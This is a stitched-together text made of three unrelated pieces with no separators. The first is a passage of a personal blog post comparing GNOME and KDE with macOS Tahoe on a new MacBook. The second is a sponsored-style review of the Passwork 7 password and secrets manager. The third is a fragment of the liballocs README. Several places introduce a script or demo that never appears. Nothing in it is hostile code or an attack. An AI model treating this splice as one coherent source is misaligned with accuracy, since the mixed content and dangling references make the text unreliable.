And boy, how wrong I was, thinking that KDE was a buggy mess that would drain my resources even worse than GNOME.
KDE Plasma 5 was nothing like I imagined - it was fast, lightweight, and slick.
As a fan of the old Unity design and OSX looks, I configured my Plasma accordingly, but it wasn’t a full clone like the ones other people often made.
Instead, I tried to keep Plasma looking like Plasma, but feeling like a mix between Unity and OSX:
Figure 2:
To this day, I still think this was beautiful. I’ve spent a lot of time fiddling with icon spacings in the top panel, combining widgets, writing my own in QML, just to throw it all away, a few years later
I ran Plasma 5 for about two years, and while I was enjoying it, there was still a lot of jank, bugs, and occasional crashes (although Plasma recovered from them beautifully), and meanwhile GNOME had become a lot better.
So I switched back to GNOME, and I’m still running it on my old laptop, where I’m writing this part of the text right now:
Figure 3:
GNOME 42 (Note: I have a 2K display and run GNOME without scaling, with enlarged fonts instead. Helps a lot with oversized GNOME UI elements taking up space)
As you can see, there are no fancy extensions - everything is the same as in a stock Fedora Workstation, because it is a stock Fedora Workstation.
And I love it.
Over the years, I had a love-hate relationship with GNOME, but after a while, I came to accept it as it is, and now it feels like a perfect desktop environment for me personally.
That, of course, is thanks to GNOME developers actually trying to make GNOME better, and me buying into their vision of what an OS should look and feel like.
There is still some jankiness to it, but I’m willing to overlook it at this point, because after years of searching, I couldn’t find anything that suits my workflow better.
And I’m fine with that.
A disclaimer
Before I go crazy on bashing macOS, I need to make a disclosure -
I AM BIASED
.
I’ve been using GNOME for a long time, and a lot of things that feel logical to me may not feel logical at all to others.
Especially for macOS users.
I’m fully aware of that.
Now, with that outta the way, let’s begin.
A new laptop
As I mentioned, I’ve just got myself a MacBook.
I did it because today’s laptop market is a bit odd.
It’s hard to find a decent non-gaming laptop with good specs.
I mean, there are Lenovo ThinkPads, ThinkBooks, and even IdeaPads that are decent, but I already owned an IdeaPad, and while it served me for six years and I liked it, I don’t know if I want another one.
Other brands may offer similar hardware, but I didn’t investigate much.
One of the reasons is OS choices.
You see, I have run Linux as my main OS since around 2008.
But I still have to use Windows from time to time.
During my university years, most of the non-programming software was Windows-only.
After university, I had to use Windows to do media stuff, like music recording and video production, or design.
Design is probably the only task Linux can handle without much of a hassle, given that there are decent programs for that.
For instance, I don’t mind GIMP, Krita, or Inkscape for most of my image-related tasks.
I can even do video editing in Blender (and I do), but for some reason, it just works better under Windows.
Audio production - not a chance.
You’ll find me dead in the ground before I figure out how to set up a realtime kernel and configure Jack.
Not to mention, VSTs just don’t work because many rely on Windows APIs, and patching them through Wine is not a path I would like to walk.
So I had to use Windows, constantly rebooting from Linux to it every time I wanted to record myself, or work on some video for my channel.
And I also had to use the one that came with my laptop - 6 years ago, it was Windows 10.
My parents recently got a new laptop with Windows 11 on it, and my god, it is horrible.
After using Linux for more than fifteen years, I can’t even imagine how Microsoft is still able to get away with it.
Ads are everywhere - on the lockscreen, in the start menu, in notifications, etc.
You can’t even activate it without connecting to the network and signing into a Microsoft account.
Oh, and updates.
Fucking updates get forced on me while I’m waiting another 5 hours for my video to finish rendering, because my laptop is too old to render in 4K.
Yes, it’s possible to “debloat” Windows, remove most of the jank they added, disable automatic updates, and have a decent, clean experience.
I just don’t want to do that.
The whole point of an operating system, to me, is to stay out of the way while managing resources, processes, and making sure my shit is done without major hiccups.
Now that Windows 10 support is ending, all we’re left with is Windows 11, and god knows what bullshit awaits us in Windows 12.
So I thought to myself: “OK, I like Linux, but I want to be able to do my media-related stuff, and I don’t want to invest the time to make Linux able to do it. What other options do I have?”
I had just applied for a new job, and almost everyone there uses a Mac, and many of them are musicians, either hobbyists like myself or even professionals.
After asking around, it seemed to me that switching to macOS could be the solution I was looking for.
It’s a Unix, so I guess my Linux habits won’t have to go through WSL hoops, and it has world-class support for media tasks.
I think macOS can even be considered media-first when it comes to production, unlike Linux or Windows.
So I saved some money and got myself a new MacBook Pro, with M4, and decent specs.
The laptop itself is nice - I like the aluminium body, the keyboard is nice (although I once had the opportunity to use their butterfly one, and liked it better), the screen is gorgeous, and even the laptop speakers are great, but…
…but the OS…
macOS
This is the most counter-intuitive, user-unfriendly, confusing piece of software that I’ve used in my life.
And I worked as a consultant in a cellphone store and used cashier software, yet even that was not as horrid.
I’m sure nothing I will write here will be new, and I’m committing an “internet crime” of “beating a dead horse” here, while it’s probably already reduced to vapors, but I still want to get it out of my system.
The Desktop
My laptop came with macOS 15 Sequoia preinstalled, so I haven’t used previous versions much, although I had used a Mac a bunch of times in the past when I was at the university ten plus years ago.
However, I decided to immediately upgrade to macOS 26.1 Tahoe, so I wouldn’t get too used to the good-looking interface, and would instead learn to get comfortable with this liquid glass crap.
So I didn’t touch macOS for some years, and some things have changed, but the majority of annoyances I remember are still here.
Virtual desktops
As an ex-GNOME user, I like my virtual desktops.
MacOS has had virtual desktops for a long time, but I think GNOME handled those better.
First of all, switching with the touchpad gesture feels a lot slower.
In GNOME, it wasn’t an animation - the speed was tied directly to how fast you move your fingers, with easing after you release them.
I got used to switching between desktops with a lot of speed, and on macOS, it’s not like that.
It seems it is also tied to the speed of the gesture, but it feels like there’s a cap on the maximum possible speed:
An additional feature of GNOME is that it will automatically create additional virtual desktops once you’ve filled all of them, and there’s no limit to how many you can have.
I usually have 4-5 desktops, but when I’m not working on something, it’s nice that I can only have one or two.
In macOS, you can have as many desktops as you want, however, they’re not added automatically.
Or at least I couldn’t find a setting for that.
Because of that, even if I’m not using all of them, sometimes a stray window is sitting on the last desktop, and I have to go through all of them to get to it.
Fullscreen and maximize button
For some reason, the developers decided that the maximize button should instead act like a fullscreen button in macOS.
When you maximize a window, it is moved to its own, dedicated virtual desktop - and
I like it
.
I have used this pattern in GNOME for a long time by installing an
extension
that brings this feature into GNOME.
However, and it is a big
however
, in GNOME, when I maximize a window, it creates a virtual desktop next to the one I’m on.
In macOS, it also creates a virtual desktop, but it moves it to the far right.
So, imagine I’m browsing the web, seeing something interesting, and I want to open Emacs to take a note.
I open Emacs, maximize it, and on the desktop to the left of Emacs, I still have my browser, and I can switch between these back and forth.
In macOS, if I do this, the window is moved to a desktop at the far end of the list of desktops.
You can rearrange those manually, but it’s clumsy.
I would much prefer if the desktop were created to the right of the current one.
Figure 4:
Emacs was opened on Desktop 1, but after maximizing it is now essentially on Desktop 5
You can prevent this, in some form, by turning on the “Automatically rearrange Spaces based on most recent use” in the settings.
Then, a new fullscreen desktop is created to the right of the one you’re currently on, which is nice, however, then the spaces get rearranged all the time.
Like, when you open a link from the messenger, you switch to the desktop that has the browser open.
The spaces get rearranged, such that the desktop with the messenger is now next to the one with the browser, so you have to find the other one that was previously in between.
It’s so bizarre that we can’t have fullscreen spaces created next to the current one without automatic rearrangement.
And, because it is a fullscreen mode, it also makes things go a bit haywire for some applications.
Emacs doesn’t like this mode in particular.
Right now, I’m using four virtual desktops and manually organizing those, but maybe I need to adjust my usage pattern.
Speaking of virtual desktops, let’s look at the Mission Control thing.
Mission Control
That’s another pain point for me.
You see, GNOME also has something akin to Mission Control - you swipe up with three fingers, and you see all your open windows:
You can then move your windows between desktops or switch between them.
MacOS also has this, with the exact same gesture:
However, it is far less useful.
In GNOME, I can close windows in the Overview:
Figure 5:
This close button is part of the Overview, not the window manager
I can tweak the dock:
Figure 6:
Actually, the dock is only visible in Overview
I can start typing, and the search appears:
I can even swipe up again and bring up the applications menu:
Figure 7:
Not that I use it that much though
There’s a lot of control!
Wanna know how much you can control in the Mission Control?
You can move windows and desktops around.
…
That’s it!
What mission?
What control?
You can’t do anything.
Sure, one advantage macOS’s Mission Control has is that you can move entire desktops around - in GNOME, you can’t rearrange desktops themselves, only windows.
And it plays nicely with all this full-screen nonsense, but I still much prefer the GNOME approach here.
The Dock
The dock is a weird concept.
It’s cool to have it, and I remember in my early Linux days I wanted a macOS-like dock so badly that I tried to make it out of existing panels and custom widgets.
I installed various dock plugins in my desktop environments just to have it zoom in on icons when I hover over them.
These days are long past.
Figure 8:
remember Cairo dock?
Figure 9:
remember Plank?
GNOME made a smart decision to only show the dock when you’re in Overview - their “Mission Control” variant.
You don’t need the dock constantly taking vertical space from your windows, and you don’t have to deal with it showing up accidentally when you simply hover the mouse pointer at the bottom of the screen.
Or at the side of the screen if it is your thing.
When it is only inside the Overview/Mission control, it makes sense as a favorites bar and a way of switching between applications.
I haven’t used
Alt
+
Tab
(or
⌘ command
+
⭾ Tab
) in years because of that.
I would much prefer for the dock to be only visible in Mission Control, but sadly, there’s no way of doing it in macOS, as far as I can see.
Moreover, the Dock becomes useless inside Mission Control specifically, so that approach wouldn’t work that well in macOS anyway.
What baffles me is that when you close an app, it stays in the dock, taking up space.
Again, there seems to be no way of disabling it.
Disabling the “Show suggested and recent apps in Dock” in system settings doesn’t affect this behavior.
You have to either use
⌘ Q
, or right-click on the dock item and choose “close”.
What’s the red button in the window for then?
Usually, the app simply continues working in the background, as if minimized.
Speaking of which, so far only the minimize button seems to work in a sane manner.
Sure, there’s little point in actually closing applications, given that this laptop has a lot of RAM and CPU power, but it always felt weird to me that apps want to stay open all the time.
I’m done with you - why do you think that you’re so important that you shouldn’t be closed?
Do what you’ve been told.
The Finder
Linux has always had weird file managers.
To me, nothing beats Microsoft’s Windows 7 file explorer - it was the least BS one in my opinion.
GNOME’s Nautilus, or Files, as it is called nowadays, had a few long-standing problems, some of which date back ten plus years.
KDE’s Dolphin was nice, but it too had some weird quirks.
However, it’s nothing in comparison to macOS Finder.
See the screenshot?
A normal file view, right?
Now, what should happen if I shrink the window?
The what?
Who thought that this was a good idea?
For those who didn’t get it, the grid of items stays the same regardless of the size of the window!
Like, seriously?
The oddities don’t end there.
Where’s the current path?
For some reason, you can only see it while holding the
⌥ option
key; it appears at the bottom of the window.
You can, in fact, toggle it in the settings so it is always shown, and while you can click on it to navigate, you can’t edit it, it seems.
Another oddity is that when moving directories around, there’s no option to merge directories with the same name by default.
I mean, when I move a directory to a different place, where another directory exists with the same name, I expect them to be merged, but the pop-up only says this:
When the
⌥ option
key is pressed preemptively and held during the drag, the option to merge directories appears:
Like, you need to know, beforehand, that the target location you’ve chosen contains a folder with the same name as the one you’re moving right now.
And if you didn’t, you need to repeat the drag.
Why not show it by default?
For the record, when the same thing is done in the GNOME file manager, it asks you if you want to merge directories, but you can’t replace them, so you can’t ever lose data.
And if it contains files with the same names, it asks for each file if you want to replace it, or keep both.
Of course, you can choose to replace all files at once, so the process doesn’t drag on.
Cutting files is also super weird.
You first copy the file as normal, then proceed to the directory you want to move the file, and press
⌘ command
+
⌥ option
+
v
.
Not only does the shortcut itself make your hand curl up as if you were a lobster, but also the semantics of this operation feel extremely weird - you copied the file, after all, why would it move afterwards?
I guess it’s handy in cases when you thought you wanted to copy the file but then decided to move it, so you don’t need to input a whole new shortcut, but it’s a minor win in my book.
Thankfully, I use graphical file managers rarely, so I can continue living in my comfort zone of Emacs’ DIRED.
Files and folders
But, while we’re at it, let’s talk about files in general.
I have some local music stored in the
Music
folder.
Some videos and films are stored in the
Videos
folder.
I also have pictures stored in the
Pictures
folder.
Crazy, right?
Imagine using the file system to store files systematically?
I also try to keep things organized, so I manage all these with some directories, like
band-name/album-name/track-name
in case of music files, or
year/place-name/photo
in case of photos.
I like it because if I want to listen to something, I can just drop the folder into the player, or open the image folder and relive those moments.
Organizing these with folders is also handy for backing these things up - just drop the folder to the external drive and you’re good to go.
In macOS, as it seems, tags are the way the system wants to work with files.
It’s a different approach, and I’m not entirely opposed to that, since filesystems are an illusion, after all.
But every once in a while, I open the
Music
folder, and I see a second
Music
folder inside it.
Apparently, it is created when opening the Music app.
I can’t use the Music app because it can’t play FLAC, which is what the majority of my local library is encoded in.
When I open the
Videos
folder, I often find a
TV
folder inside.
I’m not sure what app creates it, but it wasn’t done by me, as I never launched the TV app.
And it appears there far more regularly than the
Music/Music
one.
Other apps often create their own folders anywhere they want.
The OrbStack app creates an
OrbStack
folder in
$HOME
.
Some other app I installed created a folder in the
Music
folder for some reason, even though it didn’t store
music
in it, just some audio files.
It feels like this is not my computer, but one I share with everyone else, and I just watch as they do as they please with my filesystem.
Never once was this a problem in Linux.
Why can’t apps keep their files to themselves?
I’m tempted to create things like
Music/My Music
, or
Pictures/My Pictures
, and use them specifically, forgetting about the default
Music
,
Pictures
,
Videos
thing, but it is such a cumbersome solution.
It feels like when you invite friends to a party, and they go to your bookshelf and decide to put some of their own stuff on it for the time being.
And when they leave, they forget to take their stuff, but you don’t want to touch it, as it is not exactly yours.
And you can’t throw it out, as your friends will be mad.
I don’t know.
The media viewer
Oh, the image viewer.
Let me ask you a question:
You have a directory with some photos.
You want to go through these photos in the order taken and view them.
What do you do?
In Linux, or Windows for that matter, the answer is simple: you double-click on the image you want to start with, the image viewer is opened, and you can use the arrow keys to go back and forth.
Simple and effective!
What happens when you do it in macOS Finder?
Well, the image viewer still opens, but the arrow keys do nothing!
No, in order to go through images, you need to select the items you want to view, hover over the File menu in the top bar, press the
⌥ option
key, and select “Start slideshow
N
items”:
HUH?
Slideshow is cumbersome, as it is a slideshow - it’s not meant for going through images manually.
Alternatively, you can use a different viewer, called “Quick Look”, which supports arrow keys.
Hooray!
But what is it?
If you’re in grid view, why are the arrow keys following the grid too?
HUUUUUH
?
Who thought that this was a good idea?
Hopefully, I won’t repeat this question all too many times.
The only reasonable way of using it is by switching to the list view and using the up and down arrow keys.
Which is still not great, because Quick Look is meant for quick, temporary previews.
Any accidental click outside of it will close it, and you’ll have to find where you were and start from there.
You can put it into fullscreen mode, but then the arrow keys stop working.
This seems like such a basic feature for an image viewer, but somehow they’ve managed to make it unusable.
Not only that, but if this folder has any non-image files, like text files or PDFs, they’ll be included in the Quick Look preview too.
I understand that the purpose of Quick Look is to view files quickly, and often it is a great thing to have, but at the same time, its behavior is super weird.
Hardware accessibility
OK, I could go on and on about the software part of the OS, but to be honest, all of this is covered by other people rather well.
And, in truth, I couldn’t be bothered to try all the other preinstalled software, partly because it would take a lot of time to put it into this already long article, but also because I don’t want to.
For instance, the Music app is also weird, and I already have an
extensive post about how Linux music players are weird
, so it goes without saying that I’ll need to replace it with something else.
Like, Quick Look can play FLAC without any issues, but the Music app (formerly iTunes, I believe) can’t.
Even GNOME’s player could do that, and it kinda copies Apple’s Music app in some aspects.
Re-encoding my whole library into ALAC (Apple’s lossless equivalent of FLAC) is not an option for me.
I did it once before when I was a
happy owner
of an old 4th-gen iPod touch, but never again - it is pointless, there are better music players out there.
So to me, the silver lining is that GNOME’s built-in software is in a lot of ways better than what ships with macOS.
And KDE has even better software than GNOME in a lot of cases.
So instead, let’s talk about hardware oddities and their operating system counterparts.
The Microphone
So, while I do care about my privacy, I can’t call myself a privacy maniac.
However, one thing I like to have in my devices is the ability to mute the microphone.
It’s best when there’s a hardware switch for that, but it’s so rare that I’ve only seen it once in my life on some Lenovo laptop.
I mean, it’s simply more convenient to do that than switch to a specific application that currently uses the microphone and toggle it there.
So, on Linux, I used the microphone key found on my laptop’s keyboard.
It muted the microphone in the system settings.
When I got my Mac, I examined the keyboard, and found almost all usual shortcuts - you can change screen brightness on
F1
and
F2
, you can change volume on
F11
and
F12
, and there’s the microphone icon on
F5
.
So I naturally assumed that this was a button to mute the microphone, after all, my old laptop had it too.
I assumed wrong.
There’s
no way
to disable the microphone in macOS via inbuilt means.
The only thing you can do is to manually set the volume input gain level to 0, effectively making the microphone deaf.
Wanna know what the microphone button does then?
I’ll show you:
Yup, it asks you if you want to use the speech-to-text feature.
Cool
, right?
And you can’t change what this button does.
You can set a different shortcut for dictation in the settings, but look what happens when you press the microphone key:
It changes itself back to this button if you click “don’t ask again”!
And then it asks you again once you press it!
So what was the point of providing “don’t ask again” then?
Though I’ve managed to defeat this beast of a problem by writing some AppleScript.
This script can be executed in the Shortcuts app, and by analyzing its output, we can rename the shortcut accordingly:
After adding this shortcut to the “Controls” menu, it acts as a mute button:
Works well so far, and even remembers the current input level value, so I can still adjust it if needed.
Even better, it works more reliably than it did on Linux, where the system constantly forgot what level the mic was set to and fell back to a default value of 20%, which was too low.
Here’s a text version of the script, if anyone needs it:
I can’t share the shortcut itself because there’s no way I’m making an iCloud account for that.
The keyboard layout
Not strictly about the hardware part, since the keyboard itself is pretty good.
It’s a bit of a shame that Apple stopped using their Butterfly switches, as I did like them more than the current scissor ones, but the keyboard is still better than the one on my old laptop.
One thing that bothers me is that GNOME can remember the keyboard layout per window, something I got very accustomed to.
MacOS can’t do that - and I don’t know what the reason is.
The settings page for layouts has a setting called “Automatically switch to a document’s input source”:
However, I’m not sure what it does.
It seems to work sometimes, but other times it does the opposite of what I want.
I only have two layouts.
Is it that hard to keep track of that amount of data per window?
The keyboard layout (physical)
Let’s touch on the keyboard one more time, though.
I know that Apple has at least two keyboard layouts for different markets - one for the US and one for Europe.
Figure 10:
US layout
Figure 11:
European layout
I specifically wanted the US layout, because all other laptops and standalone keyboards I had in my entire life had this kind of layout.
Never once in my life have I seen the European layout on any device.
But, for some unknown reason, Apple sells its laptops with a European layout in my area, and when my wife had a Mac, it had that.
Every time I used it, I was fighting my muscle memory.
Sure, it has more keys, and these contain some characters otherwise inaccessible without switching the layout, so it can look like Apple does a good thing.
However, literally no one except Apple users has seen this layout, and it makes no sense to anyone else.
In my particular case, some already existing keys in the European layout are placed differently, like
.
and
?
.
So, since I didn’t want to deal with that, I got myself a version with a US layout.
Thankfully, there’s a “PC” layout in the system settings, so I don’t have to relearn anything.
Using the “PC” layout on a European keyboard, however, is even more cumbersome.
No middle click on the touchpad
For some reason, there’s no such thing as a middle-click on a touchpad.
In Linux, it is usually mapped to clicking with three fingers at the same time.
I’ve been using it in Firefox a lot, and to paste stuff into the terminal once in a while.
However, in macOS, my muscle memory is now against me.
I click with three fingers in Firefox, and usually it brings up the right-click menu, which is fine at least.
But sometimes it is registered as a left-click instead, and it is super annoying.
Re-learning to use ⌘ command + click will take some time, I guess.
The camera cutout
Same as with the microphone, I’d like to have a physical way of blocking the camera, but because Apple moved towards a custom-shaped display matrix, it can’t be done as easily as before.
It has a lot of sensors there, and blocking them with a huge plastic cover will make it impossible to close the laptop lid.
Again, not strictly about the hardware side of things, but the display in general feels weird because of this notch - it’s right in the middle of the screen, and I’m used to having the clock there, after years of using GNOME.
Some say it’s more logical to have them at the far right side, as it is commonly done on phones, but phones have a much smaller and narrower screen.
The same goes for notifications - having them in the middle feels more natural to me, because most of the content I’m working with is somewhere in the middle.
But your opinion may vary (as if anything else I said here can be universally agreed on).
The good parts
OK, enough bitching around, let’s discuss some good parts.
The screen itself is gorgeous, colors are vivid yet natural, and the 14-inch model is actually both a bit bigger and a bit taller than my old 13-inch laptop.
I like the screen a lot.
I didn’t go for the nano-texture display, as I don’t work in environments where reflections are problematic, so I can’t say how it affects image quality.
Maybe if I did, it’d be in the bad section.
The speakers are pretty good.
And for a laptop, they’re actually amazing.
They have depth, some oomph, and are loud enough to watch films in comfort - I can’t say that about any other laptop I’ve had before.
Touchpad - oh, the touchpad.
Simply put, the fact that it is a lot bigger (in fact, they had even bigger ones before), and I can press on it absolutely everywhere, is amazing.
I was also surprised to learn that it isn’t actually pressed in physically.
Instead, it is a glass surface, which has haptic feedback that simulates the click.
Purely amazing.
I’ve spent a long time trying to find anything remotely close to these touchpads on other laptops, but I never could find one.
The M4 Pro CPU is a beast.
Recently, I forgot the passphrase to one of my GPG keys and tried to brute-force it.
My old laptop had an AMD Ryzen 7 3750H, which isn’t fast by today’s standards, but it wasn’t a slow CPU either - it handled all of my tasks without major hiccups.
I tried it first on the old laptop, and it could try about 45 passphrases per second.
The M4 could try about 750 passphrases per second.
Everything is
so fast
I can’t believe it.
The macOS itself isn’t all that bad.
As a matter of fact, writing this post helped me figure out how to fix a lot of the problems I initially had - this post was a lot longer before that, but I had to cut stuff from it, as it was no longer applicable.
There are still some oddities - it constantly bothers me by asking for permission to run apps for the first time, because I install them through
brew
or download them from the official website (again, I’m not making an Apple account, no, no).
But I finally have a machine on which I can do both my programming tasks and media tasks without needing to keep two different operating systems to handle each task specifically.
Finally, I can record my music with my right hand while writing code with the left - a dream.
Even the liquid glass thing is not as bad as I thought it would be.
Thankfully, Apple added a tinted style to it, so it is less transparent, which helps readability.
And overall, I really like the device - it feels solid, and like it will last me another five years at minimum.
Hopefully I didn’t jinx myself here, though.
Anyhow, thanks for reading, and please do share your experience with me, or if you know ways of solving the problems I’ve listed, I would be glad to know about them!
Enterprise password security and secrets management with Passwork 7
Bleeping Computer
www.bleepingcomputer.com
2025-11-23 14:45:54
Organizations manage credentials across distributed teams, applications, and infrastructure — passwords, API keys, certificates, and tokens that require different access patterns and security controls. Traditional password managers address individual user needs but weren't designed for operational complexity at scale.
Different roles have different requirements: DevOps teams need programmatic access, security teams demand audit trails, IT admins require granular control. This creates demand for platforms that handle both human and machine credential management within a unified framework.
In its new release, Passwork introduces changes to credential organization, access control, and administrative functionality based on feedback from production environments. The update focuses on usability improvements and security refinements, with attention to workflow efficiency and feature accessibility.
Passwork 7 addresses a concrete operational need: maintaining credential security, enforcing access policies, and enabling team collaboration without disrupting existing workflows. This review examines version 7's practical capabilities and integration characteristics.
What is enterprise password management
Enterprise password management goes beyond storing login credentials. It encompasses the complete lifecycle of sensitive authentication data across an organization: secure generation, encrypted storage, controlled access, automated rotation, and comprehensive auditing.
Unlike consumer password managers, enterprise solutions must support complex organizational structures, integrate with existing infrastructure (LDAP, SSO), provide role-based access control (RBAC), and maintain detailed compliance logs. For organizations managing hundreds of employees and thousands of credentials, these capabilities are essential.
The secrets management challenge
While passwords serve as authentication mechanisms for human users, secrets function as authentication credentials for machine-to-machine communication. API keys, database connection strings, SSH keys, access tokens, and digital certificates enable applications, services, and automated processes to establish secure connections across distributed systems.
The challenge lies in scale and distribution. Modern infrastructure generates secrets at an accelerating rate — embedded in configuration files, injected as environment variables, referenced in deployment manifests, and occasionally exposed in version control systems. Without centralized governance, organizations encounter systemic risks:
Security exposure:
Hardcoded credentials in application code create persistent attack surfaces and expand the blast radius of potential breaches.
Operational chaos:
Scattered secrets across systems make rotation nearly impossible.
Compliance gaps:
Absence of centralized audit mechanisms eliminates visibility into access patterns, credential usage, and policy enforcement.
DevOps bottlenecks:
Manual credential distribution slows deployment pipelines.
Effective secrets management addresses these challenges through centralized storage, automated rotation, programmatic access, and complete operational transparency.
Passwork 7: Two products in one unified platform
The platform evolved beyond traditional password storage into a comprehensive secrets management platform. The system now combines two full-fledged products in one unified interface:
Password manager:
An intuitive interface where employees securely store and share credentials for daily work. The streamlined design reduces onboarding time, making it practical for organizations where staff have varying technical expertise.
Secrets management system:
Programmatic access through REST API, Python connector, CLI, and Docker containers enables DevOps teams to automate credential workflows without compromising security.
This dual functionality eliminates the need for separate tools, reducing complexity and licensing costs while improving security posture.
Key features of Passwork for enterprise security
Passwork's feature set solves the practical challenges of enterprise credential security: structuring access across departments, maintaining audit trails for compliance, and automating credential management without rebuilding workflows.
Flexible vault architecture
Like most enterprise password management platforms, Passwork organizes data hierarchically: passwords nested in folders, folders contained within vaults. The structure is familiar, but Passwork's vault layer offers more granular control and flexibility in how access is defined and distributed.
Version 7 introduced a
vault types architecture
that transforms how organizations structure credential access. The system provides three approaches:
User vaults
remain private by default, accessible only to their creator. These function as personal credential stores that users can selectively share with colleagues when collaboration requires it.
Company vaults
automatically include corporate administrators alongside the vault creator. This ensures continuous oversight — administrators cannot be removed or demoted, guaranteeing that leadership maintains visibility into critical credentials.
Custom vault
types represent the most powerful option. Administrators can create unlimited vault types tailored to specific departments, projects, or security requirements. For each custom type, you define designated administrators, configure creator permissions, and establish rules about who can create new vaults.
This flexibility allows organizations to mirror their internal structure within Passwork. An IT director manages IT vaults, the finance director oversees financial credentials, and HR maintains employee access information — all within a single platform with appropriate isolation and oversight.
Meanwhile, a security administrator can be granted access across all vaults for audit and compliance purposes without disrupting departmental autonomy.
Organizations with strict security policies can disable user vault creation entirely, enforcing a model where all credentials reside exclusively in company-controlled or custom vault types.
Granular access control with RBAC and user groups
Access control in
Passwork
operates through a role-based system that scales from small teams to enterprise deployments. Administrators create roles that define specific permissions — what actions users can perform within the system.
The system imposes no artificial limits on role creation, enabling organizations to implement precisely tailored permission structures.
You might grant certain users rights to manage specific roles and groups while restricting access to system configurations. Department heads receive control over their team's credentials without accessing other departments' data.
User groups further streamline permission management. By adding users to a group, they automatically inherit the group's permissions across relevant vaults and folders.
This approach reduces administrative overhead when onboarding new team members or restructuring departments.
Secure credential sharing for internal and external users
Passwork offers multiple methods for credential sharing, each designed for specific use cases:
Internal sharing
enables credential distribution to individuals or groups within your company. Permissions cascade through the vault and folder hierarchy, ensuring users access exactly what they need without exposing unrelated credentials.
External sharing
addresses the common challenge of securely providing credentials to contractors, vendors, or temporary partners. Passwork generates secure, time-limited links that grant access without requiring external users to create accounts or install software.
The platform also offers granular password sharing through its internal password sending system and shortcuts. Access can be revoked at any time, and the system automatically reminds administrators through the security dashboard which users previously had access to each credential.
Every sharing action generates audit logs, providing complete visibility into credential access patterns and supporting compliance requirements.
Complete audit trails and compliance
Every action in Passwork generates activity log entries. Track who accessed which credentials, when, and what actions they performed. Export logs for analysis or integration with SIEM systems.
This operational transparency facilitates regulatory compliance (SOC 2, ISO 27001,
GDPR
) and enables rapid incident response.
When suspicious activity occurs, administrators can quickly identify affected credentials and revoke access.
Enhanced notification system
In addition to audit logs, Passwork 7 introduces customizable notifications with flexible delivery options. Users choose notification types and delivery methods (in-app or email) for authentication events and activity log entries.
Each event type can be configured independently. Receive critical security alerts via email immediately. View routine activity updates in-app when convenient. Disable notifications entirely for specific event types.
Integration with corporate identity infrastructure
Enterprise deployments require native integration with existing authentication systems.
Passwork delivers this through comprehensive SSO and LDAP support. Disable an account in Active Directory, and Passwork access revokes immediately.
Automation tools: Python connector, CLI, and Docker
The solution is built on API-first principles, meaning every function available in the user interface is accessible through the REST API. This architecture enables complete
programmatic control
over the platform.
The API provides access to all system functions: password management, vault operations, folder structures, user administration, role assignments, tags, file attachments, and comprehensive event logs.
This allows DevOps teams to automate access provisioning, update credentials programmatically, integrate Passwork into deployment pipelines, and export logs for security analysis.
Passwork
provides multiple automation tools designed for different workflows:
Python connector
— The official Python library eliminates complexity by abstracting low-level API calls and cryptographic operations.
Command-line interface
— The CLI enables shell script integration and manual credential management from the terminal. DevOps engineers can incorporate Passwork operations into deployment scripts, automation workflows, and system administration tasks.
Docker container
— Official Docker image simplifies deployment in containerized environments. This approach integrates naturally with Kubernetes, container orchestration platforms, and microservices architectures.
Zero-knowledge architecture
Passwork's Zero knowledge mode encrypts all data client-side before transmission. Even if attackers compromise the server, they cannot decrypt stored credentials.
Each user maintains their own master password, never transmitted to the server. Only the user can decrypt their accessible credentials.
This architecture provides maximum security for organizations handling highly sensitive data.
Self-hosted deployment
Passwork operates as a self-hosted password manager, meaning the entire platform runs on your infrastructure — whether on-premises servers or private cloud environments. No credentials ever touch third-party servers.
This deployment model addresses critical requirements that cloud-based solutions cannot satisfy:
Data sovereignty and compliance:
Organizations subject to GDPR, HIPAA, or sector-specific regulations maintain complete control over credential data location and residency policies.
Network isolation:
Deploy within air-gapped networks or segmented security zones. Critical credentials never traverse public internet connections.
Custom security policies:
Implement your own backup strategies, encryption standards, access controls, and monitoring systems. Define precisely how Passwork integrates with existing security infrastructure.
Zero vendor dependency:
Cloud password managers introduce risks — service outages, policy changes, acquisitions. Self-hosting eliminates this variable entirely.
For enterprises where credential security cannot depend on external providers, self-hosted architecture is foundational.
Why choose Passwork for enterprise environments
Passwork 7 addresses the fundamental challenge facing modern IT organizations: managing both human and machine credentials within a single, secure platform.
Self-hosted deployment keeps sensitive data within your infrastructure, satisfying data residency requirements and regulatory constraints.
Unified platform eliminates the need for separate password and secrets management tools, reducing costs and complexity.
API-first architecture enables comprehensive automation without sacrificing usability for non-technical staff.
Flexible access control supports complex organizational structures through unlimited custom roles and vault types.
Zero-knowledge encryption protects against server compromise, providing maximum security for sensitive credentials.
Complete automation through Python connector, CLI, and Docker integration streamlines DevOps workflows.
For organizations seeking enterprise password management and secrets management within a single solution, Passwork delivers security, flexibility, and automation.
Migrating from other password managers
Passwork supports migration from existing password management solutions, enabling organizations to transition without losing data. The platform provides import tools and documentation for common formats, streamlining the migration process.
Planning your vault structure before migration ensures optimal organization from day one. Consider how your departments, projects, and teams should map to vault types, and establish permission structures that reflect your security policies.
The company provides a 10% discount for organizations migrating from other password managers, making the transition both technically seamless and financially advantageous.
Conclusion
Passwork
delivers a unified approach to password and secrets management that prioritizes practical deployment over theoretical features. The vault architecture, access control model, and interface design accommodate organizations across different scales and operational contexts.
Centralized credential management reduces the need for multiple specialized tools, integrates with existing infrastructure through SSO and LDAP, and supports collaboration workflows without requiring significant process changes.
The platform holds ISO 27001 certification, demonstrating compliance with internationally recognized information security management standards — essential for organizations in regulated sectors or those handling sensitive data under strict governance requirements.
Free trial options and Black Friday offers
A full-featured trial is available with no limitations. This provides an opportunity to evaluate the platform against your actual infrastructure, security policies, and team workflows before committing.
If the trial meets your requirements, a Black Friday promotion runs from November 26 through December 3, 2025, with discounts reaching 50%. Organizations already planning credential management implementations may find value in testing now and purchasing during this period.
For businesses seeking to consolidate credential management, strengthen security posture, and establish audit-ready access governance, Passwork 7 provides a comprehensive solution designed for rapid deployment with minimal operational disruption.
liballocs is a run-time library and toolchain extension which extends
Unix-like operating systems (currently GNU/Linux) with a rich run-time
reflective model.
If you want to try it, here's how to run a simple demo in a container:
You should see something like the following. This is just a simple demo
of how liballocs knows what is in memory, having precise dynamic type
information and an awareness of allocators. There are four different
allocators visible in this example. (If you're wondering why functions
have size zero, this is correct; see
GitHub issue #82
.)
At 0x55d223c01436 is a static-allocated object of size 0, type __FUN_FROM___ARG0_int$32__ARG1___PTR___PTR_signed_char$8__FUN_TO_int$32
At 0x55d2259235c0 is a __default_lib_malloc-allocated object of size 176, type __ARR0_int$32
